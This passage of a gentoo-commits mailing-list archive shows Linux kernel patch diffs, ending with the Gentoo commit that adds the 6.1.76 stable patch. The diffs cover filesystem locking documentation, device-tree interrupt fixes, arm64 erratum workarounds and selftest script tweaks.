+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index 0d705fdcf3b76..1b6e484e586dc 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -713,23 +713,23 @@ setup_xfrm6() {
+ }
+ 
+ setup_xfrm4udp() {
+-	setup_xfrm 4 ${veth4_a_addr} ${veth4_b_addr} "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 4 4500
++	setup_xfrm 4 ${veth4_a_addr} ${veth4_b_addr} "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 4 4500
+ }
+ 
+ setup_xfrm6udp() {
+-	setup_xfrm 6 ${veth6_a_addr} ${veth6_b_addr} "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 6 4500
++	setup_xfrm 6 ${veth6_a_addr} ${veth6_b_addr} "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 6 4500
+ }
+ 
+ setup_xfrm4udprouted() {
+-	setup_xfrm 4 ${prefix4}.${a_r1}.1 ${prefix4}.${b_r1}.1 "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 4 4500
++	setup_xfrm 4 ${prefix4}.${a_r1}.1 ${prefix4}.${b_r1}.1 "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 4 4500
+ }
+ 
+ setup_xfrm6udprouted() {
+-	setup_xfrm 6 ${prefix6}:${a_r1}::1 ${prefix6}:${b_r1}::1 "encap espinudp 4500 4500 0.0.0.0"
+-	setup_nettest_xfrm 6 4500
++	setup_xfrm 6 ${prefix6}:${a_r1}::1 ${prefix6}:${b_r1}::1 "encap espinudp 4500 4500 0.0.0.0" && \
++		setup_nettest_xfrm 6 4500
+ }
+ 
+ setup_routing_old() {
+diff --git a/tools/testing/selftests/net/setup_veth.sh b/tools/testing/selftests/net/setup_veth.sh
+index 1003ddf7b3b26..227fd1076f213 100644
+--- a/tools/testing/selftests/net/setup_veth.sh
++++ b/tools/testing/selftests/net/setup_veth.sh
+@@ -8,7 +8,7 @@ setup_veth_ns() {
+ 	local -r ns_mac="$4"
+ 
+ 	[[ -e /var/run/netns/"${ns_name}" ]] || ip netns add "${ns_name}"
+-	echo 100000 > "/sys/class/net/${ns_dev}/gro_flush_timeout"
++	echo 1000000 > "/sys/class/net/${ns_dev}/gro_flush_timeout"
+ 	ip link set dev "${ns_dev}" netns "${ns_name}" mtu 65535
+ 	ip -netns "${ns_name}" link set dev "${ns_dev}" up
+ 
+diff --git a/tools/testing/selftests/sgx/test_encl.lds b/tools/testing/selftests/sgx/test_encl.lds
+index a1ec64f7d91fc..108bc11d1d8c5 100644
+--- a/tools/testing/selftests/sgx/test_encl.lds
++++ b/tools/testing/selftests/sgx/test_encl.lds
+@@ -34,8 +34,4 @@ SECTIONS
+ 	}
+ }
+ 
+-ASSERT(!DEFINED(.altinstructions), "ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.altinstr_replacement), "ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.discard.retpoline_safe), "RETPOLINE ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.discard.nospec), "RETPOLINE ALTERNATIVES are not supported in enclaves")
+-ASSERT(!DEFINED(.got.plt), "Libcalls are not supported in enclaves")
++ASSERT(!DEFINED(_GLOBAL_OFFSET_TABLE_), "Libcalls through GOT are not supported in enclaves")


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-01  1:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-01  1:23 UTC (permalink / raw
  To: gentoo-commits

commit:     ae167afbf0fcfb7bc30848bf0ff766a7f004c6a7
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  1 01:23:29 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  1 01:23:29 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ae167afb

Linux patch 6.1.76

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1075_linux-6.1.76.patch | 8801 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8805 insertions(+)

diff --git a/0000_README b/0000_README
index 8ba5f5b4..a50e0cff 100644
--- a/0000_README
+++ b/0000_README
@@ -343,6 +343,10 @@ Patch:  1074_linux-6.1.75.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.75
 
+Patch:  1075_linux-6.1.76.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.76
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1075_linux-6.1.76.patch b/1075_linux-6.1.76.patch
new file mode 100644
index 00000000..7ee4e671
--- /dev/null
+++ b/1075_linux-6.1.76.patch
@@ -0,0 +1,8801 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-devfreq b/Documentation/ABI/testing/sysfs-class-devfreq
+index 5e6b74f304062..1e7e0bb4c14ec 100644
+--- a/Documentation/ABI/testing/sysfs-class-devfreq
++++ b/Documentation/ABI/testing/sysfs-class-devfreq
+@@ -52,6 +52,9 @@ Description:
+ 
+ 			echo 0 > /sys/class/devfreq/.../trans_stat
+ 
++		If the transition table is bigger than PAGE_SIZE, reading
++		this will return an -EFBIG error.
++
+ What:		/sys/class/devfreq/.../available_frequencies
+ Date:		October 2012
+ Contact:	Nishanth Menon <nm@ti.com>
+diff --git a/Documentation/admin-guide/abi-obsolete.rst b/Documentation/admin-guide/abi-obsolete.rst
+index d095867899c59..594e697aa1b2f 100644
+--- a/Documentation/admin-guide/abi-obsolete.rst
++++ b/Documentation/admin-guide/abi-obsolete.rst
+@@ -7,5 +7,5 @@ marked to be removed at some later point in time.
+ The description of the interface will document the reason why it is
+ obsolete and when it can be expected to be removed.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/obsolete
++.. kernel-abi:: ABI/obsolete
+    :rst:
+diff --git a/Documentation/admin-guide/abi-removed.rst b/Documentation/admin-guide/abi-removed.rst
+index f7e9e43023c13..f9e000c81828e 100644
+--- a/Documentation/admin-guide/abi-removed.rst
++++ b/Documentation/admin-guide/abi-removed.rst
+@@ -1,5 +1,5 @@
+ ABI removed symbols
+ ===================
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/removed
++.. kernel-abi:: ABI/removed
+    :rst:
+diff --git a/Documentation/admin-guide/abi-stable.rst b/Documentation/admin-guide/abi-stable.rst
+index 70490736e0d30..fc3361d847b12 100644
+--- a/Documentation/admin-guide/abi-stable.rst
++++ b/Documentation/admin-guide/abi-stable.rst
+@@ -10,5 +10,5 @@ for at least 2 years.
+ Most interfaces (like syscalls) are expected to never change and always
+ be available.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/stable
++.. kernel-abi:: ABI/stable
+    :rst:
+diff --git a/Documentation/admin-guide/abi-testing.rst b/Documentation/admin-guide/abi-testing.rst
+index b205b16a72d08..19767926b3440 100644
+--- a/Documentation/admin-guide/abi-testing.rst
++++ b/Documentation/admin-guide/abi-testing.rst
+@@ -16,5 +16,5 @@ Programs that use these interfaces are strongly encouraged to add their
+ name to the description of these interfaces, so that the kernel
+ developers can easily notify them if any changes occur.
+ 
+-.. kernel-abi:: $srctree/Documentation/ABI/testing
++.. kernel-abi:: ABI/testing
+    :rst:
+diff --git a/Documentation/filesystems/directory-locking.rst b/Documentation/filesystems/directory-locking.rst
+index dccd61c7c5c3b..193c22687851a 100644
+--- a/Documentation/filesystems/directory-locking.rst
++++ b/Documentation/filesystems/directory-locking.rst
+@@ -22,13 +22,16 @@ exclusive.
+ 3) object removal.  Locking rules: caller locks parent, finds victim,
+ locks victim and calls the method.  Locks are exclusive.
+ 
+-4) rename() that is _not_ cross-directory.  Locking rules: caller locks the
+-parent and finds source and target.  We lock both (provided they exist).  If we
+-need to lock two inodes of different type (dir vs non-dir), we lock directory
+-first.  If we need to lock two inodes of the same type, lock them in inode
+-pointer order.  Then call the method.  All locks are exclusive.
+-NB: we might get away with locking the source (and target in exchange
+-case) shared.
++4) rename() that is _not_ cross-directory.  Locking rules: caller locks
++the parent and finds source and target.  Then we decide which of the
++source and target need to be locked.  Source needs to be locked if it's a
++non-directory; target - if it's a non-directory or about to be removed.
++Take the locks that need to be taken, in inode pointer order if need
++to take both (that can happen only when both source and target are
++non-directories - the source because it wouldn't be locked otherwise
++and the target because mixing directory and non-directory is allowed
++only with RENAME_EXCHANGE, and that won't be removing the target).
++After the locks had been taken, call the method.  All locks are exclusive.
+ 
+ 5) link creation.  Locking rules:
+ 
+@@ -44,20 +47,17 @@ rules:
+ 
+ 	* lock the filesystem
+ 	* lock parents in "ancestors first" order. If one is not ancestor of
+-	  the other, lock them in inode pointer order.
++	  the other, lock the parent of source first.
+ 	* find source and target.
+ 	* if old parent is equal to or is a descendent of target
+ 	  fail with -ENOTEMPTY
+ 	* if new parent is equal to or is a descendent of source
+ 	  fail with -ELOOP
+-	* Lock both the source and the target provided they exist. If we
+-	  need to lock two inodes of different type (dir vs non-dir), we lock
+-	  the directory first. If we need to lock two inodes of the same type,
+-	  lock them in inode pointer order.
++	* Lock subdirectories involved (source before target).
++	* Lock non-directories involved, in inode pointer order.
+ 	* call the method.
+ 
+-All ->i_rwsem are taken exclusive.  Again, we might get away with locking
+-the source (and target in exchange case) shared.
++All ->i_rwsem are taken exclusive.
+ 
+ The rules above obviously guarantee that all directories that are going to be
+ read, modified or removed by method will be locked by caller.
+@@ -67,6 +67,7 @@ If no directory is its own ancestor, the scheme above is deadlock-free.
+ 
+ Proof:
+ 
++[XXX: will be updated once we are done massaging the lock_rename()]
+ 	First of all, at any moment we have a linear ordering of the
+ 	objects - A < B iff (A is an ancestor of B) or (B is not an ancestor
+         of A and ptr(A) < ptr(B)).
+diff --git a/Documentation/filesystems/locking.rst b/Documentation/filesystems/locking.rst
+index 8f737e76935ce..555215c416d90 100644
+--- a/Documentation/filesystems/locking.rst
++++ b/Documentation/filesystems/locking.rst
+@@ -99,7 +99,7 @@ symlink:	exclusive
+ mkdir:		exclusive
+ unlink:		exclusive (both)
+ rmdir:		exclusive (both)(see below)
+-rename:		exclusive (all)	(see below)
++rename:		exclusive (both parents, some children)	(see below)
+ readlink:	no
+ get_link:	no
+ setattr:	exclusive
+@@ -119,6 +119,9 @@ fileattr_set:	exclusive
+ 	Additionally, ->rmdir(), ->unlink() and ->rename() have ->i_rwsem
+ 	exclusive on victim.
+ 	cross-directory ->rename() has (per-superblock) ->s_vfs_rename_sem.
++	->unlink() and ->rename() have ->i_rwsem exclusive on all non-directories
++	involved.
++	->rename() has ->i_rwsem exclusive on any subdirectory that changes parent.
+ 
+ See Documentation/filesystems/directory-locking.rst for more detailed discussion
+ of the locking scheme for directory operations.
+diff --git a/Documentation/filesystems/porting.rst b/Documentation/filesystems/porting.rst
+index df0dc37e6f582..c6aaf340f1792 100644
+--- a/Documentation/filesystems/porting.rst
++++ b/Documentation/filesystems/porting.rst
+@@ -943,3 +943,21 @@ file pointer instead of struct dentry pointer.  d_tmpfile() is similarly
+ changed to simplify callers.  The passed file is in a non-open state and on
+ success must be opened before returning (e.g. by calling
+ finish_open_simple()).
++
++---
++
++**mandatory**
++
++If ->rename() update of .. on cross-directory move needs an exclusion with
++directory modifications, do *not* lock the subdirectory in question in your
++->rename() - it's done by the caller now [that item should've been added in
++28eceeda130f "fs: Lock moved directories"].
++
++---
++
++**mandatory**
++
++On same-directory ->rename() the (tautological) update of .. is not protected
++by any locks; just don't do it if the old parent is the same as the new one.
++We really can't lock two subdirectories in same-directory rename - not without
++deadlocks.
+diff --git a/Documentation/sphinx/kernel_abi.py b/Documentation/sphinx/kernel_abi.py
+index b5feb5b1d9054..6d8a637ad5664 100644
+--- a/Documentation/sphinx/kernel_abi.py
++++ b/Documentation/sphinx/kernel_abi.py
+@@ -39,8 +39,6 @@ import sys
+ import re
+ import kernellog
+ 
+-from os import path
+-
+ from docutils import nodes, statemachine
+ from docutils.statemachine import ViewList
+ from docutils.parsers.rst import directives, Directive
+@@ -73,60 +71,26 @@ class KernelCmd(Directive):
+     }
+ 
+     def run(self):
+-
+         doc = self.state.document
+         if not doc.settings.file_insertion_enabled:
+             raise self.warning("docutils: file insertion disabled")
+ 
+-        env = doc.settings.env
+-        cwd = path.dirname(doc.current_source)
+-        cmd = "get_abi.pl rest --enable-lineno --dir "
+-        cmd += self.arguments[0]
+-
+-        if 'rst' in self.options:
+-            cmd += " --rst-source"
++        srctree = os.path.abspath(os.environ["srctree"])
+ 
+-        srctree = path.abspath(os.environ["srctree"])
++        args = [
++            os.path.join(srctree, 'scripts/get_abi.pl'),
++            'rest',
++            '--enable-lineno',
++            '--dir', os.path.join(srctree, 'Documentation', self.arguments[0]),
++        ]
+ 
+-        fname = cmd
+-
+-        # extend PATH with $(srctree)/scripts
+-        path_env = os.pathsep.join([
+-            srctree + os.sep + "scripts",
+-            os.environ["PATH"]
+-        ])
+-        shell_env = os.environ.copy()
+-        shell_env["PATH"]    = path_env
+-        shell_env["srctree"] = srctree
++        if 'rst' in self.options:
++            args.append('--rst-source')
+ 
+-        lines = self.runCmd(cmd, shell=True, cwd=cwd, env=shell_env)
++        lines = subprocess.check_output(args, cwd=os.path.dirname(doc.current_source)).decode('utf-8')
+         nodeList = self.nestedParse(lines, self.arguments[0])
+         return nodeList
+ 
+-    def runCmd(self, cmd, **kwargs):
+-        u"""Run command ``cmd`` and return its stdout as unicode."""
+-
+-        try:
+-            proc = subprocess.Popen(
+-                cmd
+-                , stdout = subprocess.PIPE
+-                , stderr = subprocess.PIPE
+-                , **kwargs
+-            )
+-            out, err = proc.communicate()
+-
+-            out, err = codecs.decode(out, 'utf-8'), codecs.decode(err, 'utf-8')
+-
+-            if proc.returncode != 0:
+-                raise self.severe(
+-                    u"command '%s' failed with return code %d"
+-                    % (cmd, proc.returncode)
+-                )
+-        except OSError as exc:
+-            raise self.severe(u"problems with '%s' directive: %s."
+-                              % (self.name, ErrorString(exc)))
+-        return out
+-
+     def nestedParse(self, lines, fname):
+         env = self.state.document.settings.env
+         content = ViewList()
+diff --git a/Makefile b/Makefile
+index 7cd49d9eadbfc..9dd167178ab4c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 75
++SUBLEVEL = 76
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/kernel/rtc.c b/arch/alpha/kernel/rtc.c
+index fb3025396ac96..cfdf90bc8b3f8 100644
+--- a/arch/alpha/kernel/rtc.c
++++ b/arch/alpha/kernel/rtc.c
+@@ -80,7 +80,7 @@ init_rtc_epoch(void)
+ static int
+ alpha_rtc_read_time(struct device *dev, struct rtc_time *tm)
+ {
+-	int ret = mc146818_get_time(tm);
++	int ret = mc146818_get_time(tm, 10);
+ 
+ 	if (ret < 0) {
+ 		dev_err_ratelimited(dev, "unable to read current time\n");
+diff --git a/arch/arm/boot/dts/exynos4210-i9100.dts b/arch/arm/boot/dts/exynos4210-i9100.dts
+index 53e023fc1cacf..b4c7b642e4562 100644
+--- a/arch/arm/boot/dts/exynos4210-i9100.dts
++++ b/arch/arm/boot/dts/exynos4210-i9100.dts
+@@ -521,6 +521,14 @@
+ 				regulator-name = "VT_CAM_1.8V";
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <1800000>;
++
++				/*
++				 * Force-enable this regulator; otherwise the
++				 * kernel hangs very early in the boot process
++				 * for about 12 seconds, without apparent
++				 * reason.
++				 */
++				regulator-always-on;
+ 			};
+ 
+ 			vcclcd_reg: LDO13 {
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index a4bf1d5ee2068..b85820448b9d5 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -495,10 +495,10 @@
+ 					  <&gcc GCC_USB30_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 158 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 157 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 51 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -522,7 +522,7 @@
+ 			compatible = "qcom,sdx55-pdc", "qcom,pdc";
+ 			reg = <0x0b210000 0x30000>;
+ 			qcom,pdc-ranges = <0 179 52>;
+-			#interrupt-cells = <3>;
++			#interrupt-cells = <2>;
+ 			interrupt-parent = <&intc>;
+ 			interrupt-controller;
+ 		};
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index ea70eb960565e..c15f71501c6c2 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -983,8 +983,12 @@ config ARM64_ERRATUM_2457168
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
++	bool
++
+ config ARM64_ERRATUM_2966298
+ 	bool "Cortex-A520: 2966298: workaround for speculatively executed unprivileged load"
++	select ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	default y
+ 	help
+ 	  This option adds the workaround for ARM Cortex-A520 erratum 2966298.
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 78e537f1d7965..13fe1c92bf351 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -2769,8 +2769,8 @@
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 6 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 8 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 9 IRQ_TYPE_LEVEL_HIGH>;
++					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 7fc8c20450223..04106d7254000 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -3664,9 +3664,9 @@
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 14 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 14 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 15 IRQ_TYPE_EDGE_BOTH>,
+-					      <&pdc 17 IRQ_TYPE_EDGE_BOTH>;
++					      <&pdc 17 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hs_phy_irq",
+ 					  "dp_hs_phy_irq",
+ 					  "dm_hs_phy_irq",
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 1e6841902900c..4d5905ef0b411 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4048,10 +4048,10 @@
+ 					  <&gcc GCC_USB30_PRIM_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 488 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 489 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc_intc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -4099,10 +4099,10 @@
+ 					  <&gcc GCC_USB30_SEC_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+-			interrupts = <GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 490 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 491 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 10 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc_intc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index c3c12b0cd4168..8efd0e227d780 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3628,10 +3628,10 @@
+ 					  <&gcc GCC_USB30_PRIM_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 488 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 489 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -3677,10 +3677,10 @@
+ 					  <&gcc GCC_USB30_SEC_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 490 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 491 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/install.sh b/arch/arm64/boot/install.sh
+index 7399d706967a4..9b7a09808a3dd 100755
+--- a/arch/arm64/boot/install.sh
++++ b/arch/arm64/boot/install.sh
+@@ -17,7 +17,8 @@
+ #   $3 - kernel map file
+ #   $4 - default install path (blank if root directory)
+ 
+-if [ "$(basename $2)" = "Image.gz" ]; then
++if [ "$(basename $2)" = "Image.gz" ] || [ "$(basename $2)" = "vmlinuz.efi" ]
++then
+ # Compressed install
+   echo "Installing compressed kernel"
+   base=vmlinuz
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 3f917124684c5..61f22e9c92b4c 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -723,10 +723,10 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
+-#ifdef CONFIG_ARM64_ERRATUM_2966298
++#ifdef CONFIG_ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	{
+ 		.desc = "ARM erratum 2966298",
+-		.capability = ARM64_WORKAROUND_2966298,
++		.capability = ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD,
+ 		/* Cortex-A520 r0p0 - r0p1 */
+ 		ERRATA_MIDR_REV_RANGE(MIDR_CORTEX_A520, 0, 0, 1),
+ 	},
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index de16fa917e1b8..62146d48dba73 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -419,7 +419,7 @@ alternative_else_nop_endif
+ 	ldp	x28, x29, [sp, #16 * 14]
+ 
+ 	.if	\el == 0
+-alternative_if ARM64_WORKAROUND_2966298
++alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	tlbi	vale1, xzr
+ 	dsb	nsh
+ alternative_else_nop_endif
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index e73830d9f1367..2dc7ddee5f044 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,7 +71,6 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
+-WORKAROUND_2966298
+ WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+@@ -87,3 +86,4 @@ WORKAROUND_NVIDIA_CARMEL_CNP
+ WORKAROUND_QCOM_FALKOR_E1003
+ WORKAROUND_REPEAT_TLBI
+ WORKAROUND_SPECULATIVE_AT
++WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index 14508d429ffa3..434bfc1cd31a4 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -471,8 +471,9 @@ asmlinkage void start_secondary(void)
+ 	unsigned int cpu;
+ 
+ 	sync_counter();
+-	cpu = smp_processor_id();
++	cpu = raw_smp_processor_id();
+ 	set_my_cpu_offset(per_cpu_offset(cpu));
++	rcu_cpu_starting(cpu);
+ 
+ 	cpu_probe();
+ 	constant_clockevent_init();
+diff --git a/arch/mips/kernel/elf.c b/arch/mips/kernel/elf.c
+index 5582a4ca1e9e3..7aa2c2360ff60 100644
+--- a/arch/mips/kernel/elf.c
++++ b/arch/mips/kernel/elf.c
+@@ -11,6 +11,7 @@
+ 
+ #include <asm/cpu-features.h>
+ #include <asm/cpu-info.h>
++#include <asm/fpu.h>
+ 
+ #ifdef CONFIG_MIPS_FP_SUPPORT
+ 
+@@ -309,6 +310,11 @@ void mips_set_personality_nan(struct arch_elf_state *state)
+ 	struct cpuinfo_mips *c = &boot_cpu_data;
+ 	struct task_struct *t = current;
+ 
++	/* Do this early so t->thread.fpu.fcr31 won't be clobbered in case
++	 * we are preempted before the lose_fpu(0) in start_thread.
++	 */
++	lose_fpu(0);
++
+ 	t->thread.fpu.fcr31 = c->fpu_csr31;
+ 	switch (state->nan_2008) {
+ 	case 0:
+diff --git a/arch/mips/lantiq/prom.c b/arch/mips/lantiq/prom.c
+index be4829cc7a3a0..28da4e720d177 100644
+--- a/arch/mips/lantiq/prom.c
++++ b/arch/mips/lantiq/prom.c
+@@ -114,10 +114,9 @@ void __init prom_init(void)
+ 	prom_init_cmdline();
+ 
+ #if defined(CONFIG_MIPS_MT_SMP)
+-	if (cpu_has_mipsmt) {
+-		lantiq_smp_ops = vsmp_smp_ops;
++	lantiq_smp_ops = vsmp_smp_ops;
++	if (cpu_has_mipsmt)
+ 		lantiq_smp_ops.init_secondary = lantiq_init_secondary;
+-		register_smp_ops(&lantiq_smp_ops);
+-	}
++	register_smp_ops(&lantiq_smp_ops);
+ #endif
+ }
+diff --git a/arch/mips/mm/init.c b/arch/mips/mm/init.c
+index 5a8002839550e..e8660d06f663f 100644
+--- a/arch/mips/mm/init.c
++++ b/arch/mips/mm/init.c
+@@ -417,7 +417,12 @@ void __init paging_init(void)
+ 		       (highend_pfn - max_low_pfn) << (PAGE_SHIFT - 10));
+ 		max_zone_pfns[ZONE_HIGHMEM] = max_low_pfn;
+ 	}
++
